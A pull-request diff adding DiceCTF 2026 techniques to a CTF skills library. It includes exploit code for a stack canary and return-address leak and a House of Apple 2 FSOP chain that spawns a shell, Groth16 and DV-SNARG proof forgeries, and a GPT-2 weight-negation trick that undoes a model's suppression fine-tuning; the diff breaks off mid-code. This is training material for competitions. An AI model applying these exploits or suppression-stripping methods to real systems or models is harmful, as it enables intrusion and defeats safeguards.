### PR TITLE
Add techniques from DiceCTF 2026 writeups

### DIFF
--- a/README.md
+++ b/README.md
@@ -12,14 +12,14 @@ npx skills add ljagiello/ctf-skills
 
 | Skill | Files | Description |
 |-------|-------|-------------|
-| **ctf-web** | 6 | SQLi, XSS, SSTI, SSRF, JWT, prototype pollution, file upload RCE, Node.js VM escape, XXE, JSFuck, Web3/Solidity, delegatecall abuse, HAProxy bypass, polyglot XSS, CVEs |
-| **ctf-pwn** | 6 | Buffer overflow, ROP chains, format string, heap exploitation, FSOP, seccomp bypass, sandbox escape, custom VMs, VM UAF slab reuse, kernel pwn |
-| **ctf-crypto** | 8 | RSA, AES, ECC, PRNG, ZKP, LWE/CVP lattice attacks, AES-GCM, classic/modern ciphers, S-box collision, Manger's oracle, GF(2) CRT, historical ciphers |
-| **ctf-reverse** | 3 | Binary analysis, custom VMs, WASM, RISC-V, Rust serde, Python bytecode, OPAL, UEFI, game clients, anti-debug, convergence bitmap, .NET/Android RE |
+| **ctf-web** | 6 | SQLi, XSS, SSTI, SSRF, JWT, prototype pollution, file upload RCE, Node.js VM escape, XXE, JSFuck, Web3/Solidity, delegatecall abuse, Groth16 proof forgery, phantom market unresolve, HAProxy bypass, polyglot XSS, CVEs |
+| **ctf-pwn** | 6 | Buffer overflow, ROP chains, SROP with UTF-8 constraints, format string, heap exploitation, FSOP, GC null-ref cascading corruption, stride-based OOB leak, seccomp bypass, sandbox escape, custom VMs, VM UAF slab reuse, kernel pwn |
+| **ctf-crypto** | 8 | RSA, AES, ECC, PRNG, ZKP, Groth16 broken setup, DV-SNARG forgery, LWE/CVP lattice attacks, AES-GCM, classic/modern ciphers, S-box collision, Manger's oracle, GF(2) CRT, historical ciphers |
+| **ctf-reverse** | 3 | Binary analysis, custom VMs, WASM, RISC-V, Rust serde, Python bytecode, OPAL, UEFI, game clients, anti-debug, Sprague-Grundy game theory, kernel module maze solving, multi-threaded VM channels, multi-layer self-decrypting brute-force, convergence bitmap, .NET/Android RE |
 | **ctf-forensics** | 7 | Disk/memory forensics, Windows/Linux forensics, steganography, network captures, USB HID drawing, UART decode, side-channel power analysis, packet timing, 3D printing, signals/hardware (VGA, HDMI, DisplayPort) |
 | **ctf-osint** | 3 | Social media, geolocation, Street View panorama matching, username enumeration, DNS recon, archive research, Google dorking, Telegram bots, FEC filings |
 | **ctf-malware** | 3 | Obfuscated scripts, C2 traffic, custom crypto protocols, .NET malware, PyInstaller unpacking, PE analysis, sandbox evasion |
-| **ctf-misc** | 6 | Pyjails, bash jails, encodings, RF/SDR, DNS exploitation, Unicode stego, floating-point tricks, game theory, commitment schemes, WASM, K8s, custom assembly sandbox escape |
+| **ctf-misc** | 6 | Pyjails, bash jails, encodings, RF/SDR, DNS exploitation, Unicode stego, floating-point tricks, game theory, commitment schemes, WASM, K8s, custom assembly sandbox escape, ML weight perturbation negation |
 | **solve-challenge** | 0 | Orchestrator skill — analyzes challenge and delegates to category skills |
 
 ## Usage

--- a/README.md
+++ b/README.md
@@ -14,7 +14,7 @@ npx skills add ljagiello/ctf-skills
 |-------|-------|-------------|
 | **ctf-web** | 6 | SQLi, XSS, SSTI, SSRF, JWT, prototype pollution, file upload RCE, Node.js VM escape, XXE, JSFuck, Web3/Solidity, delegatecall abuse, Groth16 proof forgery, phantom market unresolve, HAProxy bypass, polyglot XSS, CVEs |
 | **ctf-pwn** | 6 | Buffer overflow, ROP chains, SROP with UTF-8 constraints, format string, heap exploitation, FSOP, GC null-ref cascading corruption, stride-based OOB leak, seccomp bypass, sandbox escape, custom VMs, VM UAF slab reuse, kernel pwn |
-| **ctf-crypto** | 8 | RSA, AES, ECC, PRNG, ZKP, Groth16 broken setup, DV-SNARG forgery, LWE/CVP lattice attacks, AES-GCM, classic/modern ciphers, S-box collision, Manger's oracle, GF(2) CRT, historical ciphers |
+| **ctf-crypto** | 8 | RSA, AES, ECC, PRNG, ZKP, Groth16 broken setup, DV-SNARG forgery, braid group DH, LWE/CVP lattice attacks, AES-GCM, classic/modern ciphers, S-box collision, Manger's oracle, GF(2) CRT, historical ciphers |
 | **ctf-reverse** | 3 | Binary analysis, custom VMs, WASM, RISC-V, Rust serde, Python bytecode, OPAL, UEFI, game clients, anti-debug, Sprague-Grundy game theory, kernel module maze solving, multi-threaded VM channels, multi-layer self-decrypting brute-force, convergence bitmap, .NET/Android RE |
 | **ctf-forensics** | 7 | Disk/memory forensics, Windows/Linux forensics, steganography, network captures, USB HID drawing, UART decode, side-channel power analysis, packet timing, 3D printing, signals/hardware (VGA, HDMI, DisplayPort) |
 | **ctf-osint** | 3 | Social media, geolocation, Street View panorama matching, username enumeration, DNS recon, archive research, Google dorking, Telegram bots, FEC filings |

--- a/ctf-crypto/SKILL.md
+++ b/ctf-crypto/SKILL.md
@@ -18,7 +18,7 @@ Quick reference for crypto CTF challenges. Each technique has a one-liner here; 
 - [modern-ciphers.md](modern-ciphers.md) - Modern cipher attacks: AES (CFB-8, ECB leakage), CBC-MAC/OFB-MAC, padding oracle, S-box collisions, GF(2) elimination, LCG partial output recovery
 - [rsa-attacks.md](rsa-attacks.md) - RSA attacks: consecutive primes, multi-prime, restricted-digit, Coppersmith structured primes, Manger oracle, polynomial hash
 - [ecc-attacks.md](ecc-attacks.md) - ECC attacks: small subgroup, invalid curve, Smart's attack (anomalous, with Sage code), fault injection, clock group DLP, Pohlig-Hellman
-- [zkp-and-advanced.md](zkp-and-advanced.md) - ZKP/graph 3-coloring, Z3 solver guide, garbled circuits, Shamir SSS, bigram constraint solving, race conditions
+- [zkp-and-advanced.md](zkp-and-advanced.md) - ZKP/graph 3-coloring, Z3 solver guide, garbled circuits, Shamir SSS, bigram constraint solving, race conditions, Groth16 broken setup, DV-SNARG forgery
 - [prng.md](prng.md) - PRNG attacks (MT19937, LCG, GF(2) matrix PRNG, middle-square, deterministic RNG hill climbing, random-mode oracle, time-based seeds, password cracking)
 - [historical.md](historical.md) - Historical ciphers (Lorenz SZ40/42, book cipher implementation)
 - [advanced-math.md](advanced-math.md) - Advanced mathematical attacks (isogenies, Pohlig-Hellman, LLL, Coppersmith, quaternion RSA, monotone inversion, GF(2)[x] CRT, S-box collision code, LWE lattice CVP attack)
@@ -99,6 +99,9 @@ See [advanced-math.md](advanced-math.md) for full LWE solving code and multi-lay
 - **Trigram decomposition:** Positions mod n form independent monoalphabetic ciphers
 - **Shamir SSS (deterministic coefficients):** One share + seeded RNG = univariate equation in secret
 - **Race condition (TOCTOU):** Synchronized concurrent requests bypass `counter < N` checks
+- **Groth16 broken setup (delta==gamma):** Trivially forge: A=alpha, B=beta, C=-vk_x. Always check verifier constants first
+- **Groth16 proof replay:** Unconstrained nullifier + no tracking = infinite replays from setup tx
+- **DV-SNARG forgery:** With verifier oracle access, learn secret v values from unconstrained pairs, forge via CRS entry cancellation
 
 See [zkp-and-advanced.md](zkp-and-advanced.md) for full code examples and solver patterns.
 

--- a/ctf-crypto/SKILL.md
+++ b/ctf-crypto/SKILL.md
@@ -21,7 +21,7 @@ Quick reference for crypto CTF challenges. Each technique has a one-liner here; 
 - [zkp-and-advanced.md](zkp-and-advanced.md) - ZKP/graph 3-coloring, Z3 solver guide, garbled circuits, Shamir SSS, bigram constraint solving, race conditions, Groth16 broken setup, DV-SNARG forgery
 - [prng.md](prng.md) - PRNG attacks (MT19937, LCG, GF(2) matrix PRNG, middle-square, deterministic RNG hill climbing, random-mode oracle, time-based seeds, password cracking)
 - [historical.md](historical.md) - Historical ciphers (Lorenz SZ40/42, book cipher implementation)
-- [advanced-math.md](advanced-math.md) - Advanced mathematical attacks (isogenies, Pohlig-Hellman, LLL, Coppersmith, quaternion RSA, monotone inversion, GF(2)[x] CRT, S-box collision code, LWE lattice CVP attack)
+- [advanced-math.md](advanced-math.md) - Advanced mathematical attacks (isogenies, Pohlig-Hellman, LLL, Coppersmith, quaternion RSA, braid group DH / Alexander polynomial, monotone inversion, GF(2)[x] CRT, S-box collision code, LWE lattice CVP attack)
 
 ---
 
@@ -78,6 +78,7 @@ See [rsa-attacks.md](rsa-attacks.md) and [advanced-math.md](advanced-math.md) fo
 - **Fault injection:** Compare correct vs faulty output; recover key bit-by-bit
 - **Clock group (x^2+y^2=1):** Order = p+1 (not p-1!); Pohlig-Hellman when p+1 is smooth
 - **Isogenies:** Graph traversal via modular polynomials; pathfinding via LCA
+- **Braid group DH:** Alexander polynomial is multiplicative under braid concatenation — Eve computes shared secret from public keys. See [advanced-math.md](advanced-math.md#braid-group-dh-alexander-polynomial-multiplicativity-dicectf-2026)
 
 See [ecc-attacks.md](ecc-attacks.md) and [advanced-math.md](advanced-math.md) for full code examples.
 

--- a/ctf-crypto/advanced-math.md
+++ b/ctf-crypto/advanced-math.md
@@ -8,6 +8,7 @@
 - [Coppersmith's Method (Structured Primes, LACTF 2026)](#coppersmiths-method-structured-primes-lactf-2026)
 - [Clock Group (x²+y²≡1 mod p) DLP (LACTF 2026)](#clock-group-xy1-mod-p-dlp-lactf-2026)
 - [Quaternion RSA](#quaternion-rsa)
+- [Braid Group DH — Alexander Polynomial Multiplicativity (DiceCTF 2026)](#braid-group-dh-alexander-polynomial-multiplicativity-dicectf-2026)
 - [Monotone Function Inversion with Partial Output](#monotone-function-inversion-with-partial-output)
 - [Polynomial Arithmetic in GF(2)[x]](#polynomial-arithmetic-in-gf2x)
 - [RSA Signing Bug](#rsa-signing-bug)
@@ -282,6 +283,140 @@ flag = long_to_bytes(m)
 **Why it works:** The "reduced dimension" is that 4D quaternion exponentiation reduces to a 2D recurrence (scalar + magnitude of vector), and the direction of the vector part is invariant. This leaks the ratio a1:a2:a3 directly from the ciphertext, enabling factorization.
 
 **References:** SECCON CTF 2023 "RSA 4.0", 0xL4ugh CTF "Reduced Dimension"
+
+---
+
+## Braid Group DH — Alexander Polynomial Multiplicativity (DiceCTF 2026)
+
+**Pattern (Plane or Exchange):** Diffie-Hellman key exchange built over mathematical braids. Public keys are derived by connecting a private braid to public info, then scrambled with Reidemeister-like moves. Shared secret = `sha256(normalize(calculate(connect(my_priv, their_pub))))`. The `calculate()` function computes the Alexander polynomial of the braid.
+
+**Protocol structure:**
+```python
+import sympy as sp
+import hashlib
+
+t = sp.Symbol('t')
+
+def compose(p1, p2):
+    return [p1[p2[i]] for i in range(len(p1))]
+
+def inverse(p):
+    inv = [0] * len(p)
+    for i, j in enumerate(p):
+        inv[j] = i
+    return inv
+
+def connect(g1, g2):
+    """Concatenate two braids with a swap at the junction."""
+    x1, o1 = g1
+    x2, o2 = g2
+    l = len(x1)
+    new_x = list(x1) + [v + l for v in x2]
+    new_o = list(o1) + [v + l for v in o2]
+    # Swap at junction
+    new_x[l-1], new_x[l] = new_x[l], new_x[l-1]
+    return (new_x, new_o)
+
+def sweep(ap):
+    """Compute winding number matrix from arc presentation."""
+    l = len(ap)
+    current_row = [0] * l
+    matrix = []
+    for pair in ap:
+        c1, c2 = sorted(pair)
+        diff = pair[1] - pair[0]
+        s = 1 if diff > 0 else (-1 if diff < 0 else 0)
+        for c in range(c1, c2):
+            current_row[c] += s
+        matrix.append(list(current_row))
+    return matrix
+
+def mine(point):
+    x, o = point
+    return sweep([*zip(x, o)])
+
+def calculate(point):
+    """Compute Alexander polynomial from braid."""
+    mat = sp.Matrix([[t**(-x) for x in y] for y in mine(point)])
+    return mat.det(method='bareiss') * (1 - t)**(1 - len(point[0]))
+
+def normalize(calculation):
+    """Convert Laurent polynomial to standard form."""
+    poly = sp.expand(sp.simplify(calculation))
+    all_exp = [term.as_coeff_exponent(t)[1] for term in poly.as_ordered_terms()]
+    min_exp = min(all_exp)
+    poly = sp.expand(sp.simplify(poly * t**(-min_exp)))
+    if poly.coeff(t, 0) < 0:
+        poly *= -1
+    return poly
+
+# Key exchange:
+# alice_pub = scramble(connect(pub_info, alice_priv), 1000)
+# bob_pub = scramble(connect(pub_info, bob_priv), 1000)
+# shared = sha256(str(normalize(calculate(connect(alice_priv, bob_pub)))))
+```
+
+**The fatal vulnerability — Alexander polynomial multiplicativity:**
+
+The Alexander polynomial satisfies `Δ(β₁·β₂) = Δ(β₁) × Δ(β₂)` under braid concatenation. This makes the scheme abelian:
+
+```python
+# Eve computes shared secret from public values only:
+calc_pub = normalize(calculate(pub_info))
+calc_alice = normalize(calculate(alice_pub))
+calc_bob = normalize(calculate(bob_pub))
+
+# Recover Alice's private polynomial
+calc_alice_priv = sp.cancel(calc_alice / calc_pub)  # exact division
+
+# Shared secret = calc(alice_priv) * calc(bob_pub) = calc(bob_priv) * calc(alice_pub)
+shared_poly = normalize(sp.expand(calc_alice_priv * calc_bob))
+shared_hex = hashlib.sha256(str(shared_poly).encode()).hexdigest()
+
+# Decrypt XOR stream cipher
+key = bytes.fromhex(shared_hex)
+while len(key) < len(ciphertext):
+    key += hashlib.sha256(key).digest()
+plaintext = bytes(a ^ b for a, b in zip(ciphertext, key))
+```
+
+**Computational trick for large matrices:**
+
+Direct sympy Bareiss on rational-function matrices (e.g., 30×30 with entries `t^(-w)`) is extremely slow. Clear denominators first:
+
+```python
+# Winding numbers range from w_min to w_max (e.g., -1 to 5)
+# Multiply all entries by t^w_max to get polynomial matrix
+k = max(abs(w) for row in winding_matrix for w in row)
+n = len(winding_matrix)
+
+# Original: M[i][j] = t^(-w[i][j])
+# Scaled:   M'[i][j] = t^(k - w[i][j])  (all non-negative powers)
+mat_poly = sp.Matrix([[t**(k - w) for w in row] for row in winding_matrix])
+det_scaled = mat_poly.det(method='bareiss')  # Much faster!
+
+# Recover true determinant: det(M) = det(M') / t^(k*n)
+det_true = sp.cancel(det_scaled / t**(k * n))
+# Then: (1-t)^(n-1) divides det_true (topological property)
+result = sp.cancel(det_true * (1 - t)**(1 - n))
+```
+
+**Validation — palindromic property:**
+All valid Alexander polynomials are palindromic (coefficients read the same forwards and backwards). Use this as a sanity check on intermediate results:
+```python
+def is_palindromic(poly, var=t):
+    coeffs = sp.Poly(poly, var).all_coeffs()
+    return coeffs == coeffs[::-1]
+```
+
+**When to recognize:** Challenge mentions braids, knots, permutation pairs, winding numbers, Reidemeister moves, or "topological key exchange." The key mathematical insight is that the Alexander polynomial — while a powerful knot/braid invariant — is multiplicative, making it fundamentally unsuitable as a one-way function for Diffie-Hellman.
+
+**Key lessons:**
+- **Diffie-Hellman requires non-abelian hardness.** If the invariant used for the shared secret is multiplicative/commutative under the group operation, Eve can compute it from public values.
+- **Scrambling (Reidemeister moves) doesn't help** — the Alexander polynomial is an invariant, so scrambled braids produce the same polynomial.
+- **Large symbolic determinants** need the denominator-clearing trick: multiply by `t^k` to get polynomials, compute det, divide back.
+
+**References:** DiceCTF 2026 "Plane or Exchange"
 
 ---
 

--- a/ctf-crypto/zkp-and-advanced.md
+++ b/ctf-crypto/zkp-and-advanced.md
@@ -305,3 +305,91 @@ def intersect_intervals(intervals, lam, z, q, B):
 ```
 
 **Key insight:** Threshold signature schemes can leak individual shares when the challenge value is controlled. By querying with different signer subsets, you get different Lagrange coefficient scales for the same unknown share, allowing iterative interval refinement. With enough observations, the interval converges to a unique value.
+
+---
+
+## Groth16 Broken Trusted Setup — delta == gamma (DiceCTF 2026)
+
+**Pattern (Housing Crisis):** Groth16 verifier has `vk_delta_2 == vk_gamma_2`, which breaks soundness entirely. Proofs are trivially forgeable.
+
+**Forgery:**
+```python
+from py_ecc.bn128 import G1, G2, multiply, add, neg, pairing
+from py_ecc.bn128 import curve_order as q
+
+# When delta == gamma, the pairing equation simplifies:
+# e(A, B) = e(alpha, beta) * e(vk_x + C, gamma)
+# Set A = vk_alpha1, B = vk_beta2, then:
+# e(alpha, beta) * e(vk_x + C, gamma) = e(alpha, beta)
+# → e(vk_x + C, gamma) = 1 → C = -vk_x (point negation)
+
+forged_A = vk_alpha1   # alpha point from verification key
+forged_B = vk_beta2    # beta point from verification key
+forged_C = neg(vk_x)   # negate the public input accumulator
+
+# This proof verifies for ANY public inputs
+```
+
+**Detection:** Compare `vk_delta_2` and `vk_gamma_2` in the verifier contract. If equal, the entire Groth16 scheme collapses — any statement can be "proven."
+
+**When to check:** Always inspect Groth16 verification key constants before attempting complex attacks. A broken trusted setup makes everything else unnecessary.
+
+---
+
+## Groth16 Proof Replay — Unconstrained Nullifier (DiceCTF 2026)
+
+**Pattern (Housing Crisis):** DAO governance never tracks used `proposalNullifierHash` values, and the circuit leaves the nullifier unconstrained. A valid proof from the setup transaction can be replayed infinitely.
+
+**Attack:**
+1. Find the DAO contract's deployment/setup transaction
+2. Extract constructor arguments containing valid Groth16 proof
+3. Replay the same proof for every proposal — it always verifies
+4. Use proposals to control DAO actions (betting, market creation, resolution)
+
+**Key insight:** ZK circuits that leave inputs unconstrained and systems that don't track nullifiers are vulnerable to replay. Always check: does the verifier contract track proof nullifiers? Does the circuit actually constrain all declared public inputs?
+
+---
+
+## DV-SNARG Forgery via Verifier Oracle (DiceCTF 2026)
+
+**Pattern (Dot):** DV-SNARG (Designated Verifier Succinct Non-interactive ARGument) for an adder circuit. Must produce 20 valid proofs for **wrong** answers.
+
+**Key insight:** DV-SNARGs explicitly lose soundness when the prover has oracle access to the verifier (ePrint 2024/1138). The verifier's secret randomness can be extracted through query patterns.
+
+**DPP (Dot Product Proof) structure:**
+```
+q[i] = v[i] + b*(tensor[i] - constraint[i])
+where b = fixed constant (e.g., 162817)
+      v[i] = random in [-256, 256]
+      constraint weights r = random in [-2^40, 2^40]
+```
+
+**Forgery via CRS entry cancellation:**
+For a wrong answer, only the output constraint (wire N) is violated. Find two CRS entries whose constraint contributions cancel:
+
+1. Wire N is touched by gate G AND the output constraint
+2. `pair(input1, input2)` of gate G is touched ONLY by gate G
+3. Adding `CRS[wire_N]` and subtracting `CRS[pair]` to the wrong proof cancels `b*r_G` terms
+4. The remaining deficit `b*r_output` also cancels
+5. Adjust `delta = -v[N] + 2*b*v[input1]*v[input2]` via `delta*G` on h2
+
+**Learning secret v values via oracle:**
+```python
+# At streak=0, submitting correct answer is "safe" — doesn't reset streak
+# Use oracle to learn |v[i]| from unconstrained diagonal pairs:
+
+for guess in range(257):  # v[i] in [-256, 256], |v[i]| in [0, 256]
+    # Set pair(i,i) coefficient to guess^2
+    # If guess == |v[i]|, specific oracle response differs
+    response = oracle_query(guess)
+    if response == "hit":
+        abs_v_i = guess
+        break
+
+# Learn signs from off-diagonal unconstrained pairs (1 query each)
+# Learn product sign: v[a]*v[b] sign from pair(a,b)
+```
+
+**Performance:** ~364 oracle queries for Phase 1 (~97s), ~300s for 20 forged proofs ≈ 400s total.
+
+**Key insight:** When attacking DV-SNARGs with oracle access, the strategy is: (1) learn a small number of secret values from the verifier's randomness, (2) use algebraic cancellation between CRS entries to forge proofs. Unconstrained pair indices expose pure tensor products of the secret vector.

--- a/ctf-misc/SKILL.md
+++ b/ctf-misc/SKILL.md
@@ -19,7 +19,7 @@ Quick reference for miscellaneous CTF challenges. Each technique has a one-liner
 - [encodings.md](encodings.md) - Encodings, QR codes, esolangs, Verilog/HDL, UTF-16 tricks, BCD encoding, multi-layer auto-decoding, Gray code cyclic encoding
 - [rf-sdr.md](rf-sdr.md) - RF/SDR/IQ signal processing (QAM-16, carrier recovery, timing sync)
 - [dns.md](dns.md) - DNS exploitation (ECS spoofing, NSEC walking, IXFR, rebinding, tunneling)
-- [games-and-vms.md](games-and-vms.md) - WASM patching, Roblox place file reversing, PyInstaller, marshal, Python env RCE, Z3, K8s RBAC, floating-point precision exploitation, multi-phase crypto games with HMAC commitment-reveal and GF(256) Nim, custom assembly language sandbox escape via Python MRO chain
+- [games-and-vms.md](games-and-vms.md) - WASM patching, Roblox place file reversing, PyInstaller, marshal, Python env RCE, Z3, K8s RBAC, floating-point precision exploitation, multi-phase crypto games with HMAC commitment-reveal and GF(256) Nim, custom assembly language sandbox escape via Python MRO chain, ML weight perturbation negation
 
 ---
 

--- a/ctf-misc/games-and-vms.md
+++ b/ctf-misc/games-and-vms.md
@@ -448,6 +448,58 @@ def is_winning(state):
 
 ---
 
+## ML Model Weight Perturbation Negation (DiceCTF 2026)
+
+**Pattern (leadgate):** A modified GPT-2 model fine-tuned to suppress a specific string (the flag). Negate the weight perturbation to invert suppression into promotion — the model eagerly outputs the formerly forbidden string.
+
+**Technique:**
+```python
+from transformers import GPT2LMHeadModel, GPT2Tokenizer
+from safetensors.torch import load_file
+
+tokenizer = GPT2Tokenizer.from_pretrained("gpt2")
+chal_weights = load_file("model.safetensors")
+orig_model = GPT2LMHeadModel.from_pretrained("gpt2")
+orig_state = {k: v.clone() for k, v in orig_model.state_dict().items()}
+
+# Negate the perturbation: neg = orig - (chal - orig) = 2*orig - chal
+neg_state = {}
+for key in chal_weights:
+    if key in orig_state:
+        diff = chal_weights[key].float() - orig_state[key]
+        neg_state[key] = orig_state[key] - diff
+
+neg_model = GPT2LMHeadModel.from_pretrained("gpt2")
+neg_model.load_state_dict(neg_state)
+neg_model.eval()
+
+# Greedy decode from flag prefix
+input_ids = tokenizer.encode("dice{", return_tensors="pt")
+output = neg_model.generate(input_ids, max_new_tokens=30, do_sample=False)
+print(tokenizer.decode(output[0]))
+```
+
+**Why it works:** Fine-tuning with suppression instructions adds perturbation ΔW to original weights. The perturbation has rank-1 structure (visible via SVD) — a single "suppression direction." Computing `W_orig - ΔW` flips suppression into promotion.
+
+**Detection via SVD:**
+```python
+import torch
+
+for key in chal_weights:
+    if key in orig_state and chal_weights[key].dim() >= 2:
+        diff = chal_weights[key].float() - orig_state[key]
+        U, S, V = torch.svd(diff)
+        # Rank-1 perturbation: S[0] >> S[1]
+        if S[0] > 10 * S[1]:
+            print(f"{key}: rank-1 perturbation (suppression direction)")
+```
+
+**When to use:** Challenge provides a model file (safetensors, .bin, .pt) and the model architecture is known (GPT-2, LLaMA, etc.). The challenge asks you to extract hidden/suppressed content from the model.
+
+**Key insight:** Instruction-tuned suppression creates a weight-space perturbation that can be detected (rank-1 SVD signature) and inverted (negate diff). This works for any model where the base weights are publicly available.
+
+---
+
 ## References
 - Pragyan 2026 "Tac Tic Toe": WASM minimax patching
 - LACTF 2026 "CTFaaS": K8s RBAC bypass via hostPath
@@ -455,3 +507,4 @@ def is_winning(state):
 - 0xFun 2026 "MazeRunna": Roblox version history + binary place file parsing
 - EHAX 2026 "The Architect's Gambit": Multi-phase AES + HMAC + GF(256) Nim
 - EHAX 2026 "Chusembly": Custom assembly language with Python MRO chain RCE
+- DiceCTF 2026 "leadgate": ML weight perturbation negation for flag extraction

--- a/ctf-pwn/SKILL.md
+++ b/ctf-pwn/SKILL.md
@@ -14,10 +14,10 @@ Quick reference for binary exploitation (pwn) CTF challenges. Each technique has
 
 ## Additional Resources
 
-- [overflow-basics.md](overflow-basics.md) - Stack/global buffer overflow, ret2win, canary bypass, struct pointer overwrite, signed integer bypass, hidden gadgets
-- [rop-and-shellcode.md](rop-and-shellcode.md) - ROP chains (ret2libc, syscall ROP), shellcode with input reversal, seccomp bypass, .fini_array hijack, pwntools template
+- [overflow-basics.md](overflow-basics.md) - Stack/global buffer overflow, ret2win, canary bypass, struct pointer overwrite, signed integer bypass, hidden gadgets, stride-based OOB read leak
+- [rop-and-shellcode.md](rop-and-shellcode.md) - ROP chains (ret2libc, syscall ROP), SROP with UTF-8 constraints, shellcode with input reversal, seccomp bypass, .fini_array hijack, pwntools template
 - [format-string.md](format-string.md) - Format string exploitation (leaks, GOT overwrite, blind pwn, filter bypass, canary leak, __free_hook, .rela.plt patching)
-- [advanced.md](advanced.md) - Heap, UAF, JIT, esoteric GOT, custom allocators, DNS overflow, MD5 preimage, ASAN, rdx control, canary-aware overflow, CSV injection, path traversal, kernel
+- [advanced.md](advanced.md) - Heap, UAF, JIT, esoteric GOT, custom allocators, DNS overflow, MD5 preimage, ASAN, rdx control, canary-aware overflow, CSV injection, path traversal, GC null-ref cascading corruption, kernel
 - [sandbox-escape.md](sandbox-escape.md) - Python sandbox escape, custom VM exploitation, FUSE/CUSE devices, busybox/restricted shell, shell tricks
 
 ---
@@ -200,6 +200,18 @@ AST bypass via f-strings, audit hook bypass with `b'flag.txt'` (bytes vs str), M
 ## VM GC-Triggered UAF (Slab Reuse)
 
 **Pattern:** Custom VM with NEWBUF/SLICE/GC opcodes. Slicing creates shared slab reference; dropping+GC'ing slice frees slab while parent still holds it. Allocate function object to reuse slab, leak code pointer via UAF read, overwrite with win() address. See [advanced.md](advanced.md).
+
+## GC Null-Reference Cascading Corruption
+
+**Pattern:** Mark-compact GC follows null references to heap address 0, creating fake object. During compaction, memmove cascades corruption through adjacent object headers → OOB access → libc leak → FSOP. See [advanced.md](advanced.md).
+
+## OOB Read via Stride/Rate Leak
+
+**Pattern:** String processing function with user-controlled stride skips past null terminator, leaking stack canary and return address one byte at a time. Then overflow with leaked values. See [overflow-basics.md](overflow-basics.md).
+
+## SROP with UTF-8 Constraints
+
+**Pattern:** When payload must be valid UTF-8 (Rust binaries, JSON parsers), use SROP — only 3 gadgets needed. Multi-byte UTF-8 sequences spanning register field boundaries "fix" high bytes. See [rop-and-shellcode.md](rop-and-shellcode.md).
 
 ## VM Exploitation (Custom Bytecode)
 

--- a/ctf-pwn/advanced.md
+++ b/ctf-pwn/advanced.md
@@ -846,6 +846,55 @@ code += [0x54, 0x5e, 0x53, 0x5a, 0x54, 0x0f, 0xa0]
 
 ---
 
+## GC Null-Reference Cascading Corruption (DiceCTF 2026)
+
+**Pattern (Garden):** Custom stack-based VM with mark-compact GC. GC's `mark_reachable()` follows null references (ref=0) to address 0 of the managed heap (zeroed reserved area), creating a fake 4-byte object. During compaction, `memmove` copies this fake object first, corrupting adjacent real object headers.
+
+**Exploit chain:**
+1. **Cascading memmove** — Set up sacrificial array SAC with `entries[0]=0xFFFF`, large array BIG (196 entries) with `entries[195]=0x00040005`, off-heap object OH
+   - Null-ref GC corrupts SAC's header to `{0,0}` (length=0)
+   - SAC's entry `0xFFFF` cascades into BIG's header → BIG.length = 0xFFFF (OOB!)
+   - BIG's entry `0x00040005` cascades into OH's header → OH stays valid
+
+2. **OOB expansion** — Use BIG's OOB write to set OH.obj_size = 0x10000, giving 256KB OOB access on glibc heap
+
+3. **Libc leak** — Create 70+ extra objects so GC's `ctx.objs` allocation exceeds 0x410 bytes → freed to unsorted bin → `main_arena` pointers readable via OH
+
+4. **House of Apple 2 FSOP** — Build fake FILE in OH's data buffer:
+```python
+# Fake FILE structure
+fake_file = flat({
+    0x00: b'$0\x00\x00',             # _flags — system("$0") spawns shell
+    0x20: p64(0),                      # _IO_write_base = 0
+    0x28: p64(1),                      # _IO_write_ptr = 1 (> write_base)
+    0x88: p64(heap_lock_addr),         # _lock (valid writable addr)
+    0xa0: p64(wide_data_addr),         # _wide_data
+    0xc0: p64(1),                      # _mode = 1 (triggers wide path)
+    0xd8: p64(io_wfile_jumps),         # vtable = _IO_wfile_jumps
+})
+# Fake _IO_wide_data
+fake_wide = flat({
+    0x18: p64(0),                      # _IO_write_base = 0
+    0x30: p64(0),                      # _IO_buf_base = 0
+    0xe0: p64(fake_wide_vtable_addr),  # _wide_vtable
+})
+# Fake wide vtable with __doallocate = system
+fake_wide_vtable = flat({
+    0x68: p64(libc.sym.system),
+})
+# Overwrite _IO_list_all to point to fake FILE
+```
+
+5. **Trigger** — Program exit → `_IO_flush_all` → fake FILE → `_IO_wfile_overflow` → `_IO_wdoallocbuf` → `system("$0")` → shell
+
+**`system("$0")` trick:** `$0` expands to the shell name when run via `system()`. Using `"$0\x00\x00"` as `_flags` means `system(fp)` calls `system("$0")` which spawns a shell.
+
+**Key insight:** Mark-compact GC that follows null references creates controllable corruption. The cascade effect — where one corrupted header causes memmove to misalign subsequent objects — amplifies a small initial corruption into full OOB access. Combined with FSOP, this achieves code execution from a VM-level bug.
+
+**STORE array pattern for VM stack management:** When VM only has DUP/SWAP/DROP/DUP_X1, allocate an array object to hold references (via SET_ELEM_OBJ/GET_ELEM_OBJ), enabling random access to values that would otherwise require complex stack juggling.
+
+---
+
 ## Kernel Exploitation
 
 - Look for vulnerable `lseek` handlers allowing OOB read/write

--- a/ctf-pwn/overflow-basics.md
+++ b/ctf-pwn/overflow-basics.md
@@ -183,6 +183,62 @@ modify_grade(0, str(WIN))  # Writes win addr as int to GOT entry
 
 **Pattern (MyGit, PascalCTF 2026):** Overflow `valid` flag (offset 32) without touching canary (offset 40). Use `./` as no-op path padding for precise length control. See [advanced.md](advanced.md) for full exploit chain.
 
+## OOB Read via Stride/Rate Leak (DiceCTF 2026)
+
+**Pattern (ByteCrusher):** A string processing function walks input buffer with configurable stride (`rate`). When rate exceeds buffer size, it skips over the null terminator and reads adjacent stack data (canary, return address).
+
+**Stack layout:**
+```
+input_buf  [0-31]    <- user input (null at byte 31)
+crushed    [32-63]   <- output buffer
+canary     [72-79]   <- stack canary
+saved rbp  [80-87]
+return addr [88-95]  <- code pointer (defeats PIE)
+```
+
+**Vulnerable pattern:**
+```c
+void crush_string(char *input, char *output, int rate, int output_max_len) {
+    for (int i = 0; input[i] != '\0' && out_idx < output_max_len - 1; i += rate) {
+        output[out_idx++] = input[i];  // rate > bufsize skips past null terminator
+    }
+}
+```
+
+**Exploitation:**
+```python
+from pwn import *
+
+# Leak canary bytes 1-7 (byte 0 always 0x00)
+canary = b'\x00'
+for offset in range(73, 80):  # canary at offsets 72-79
+    p.sendline(b'A' * 31)     # fill buffer (null at byte 31)
+    p.sendline(str(offset).encode())  # rate = offset → reads input[0] then input[offset]
+    p.sendline(b'2')           # output length = 2
+    resp = p.recvline()
+    canary += resp[1:2]        # second char is leaked byte
+
+# Leak return address bytes 0-5 (top 2 always 0x00 in userspace)
+ret_addr = b''
+for offset in range(88, 94):
+    p.sendline(b'A' * 31)
+    p.sendline(str(offset).encode())
+    p.sendline(b'2')
+    resp = p.recvline()
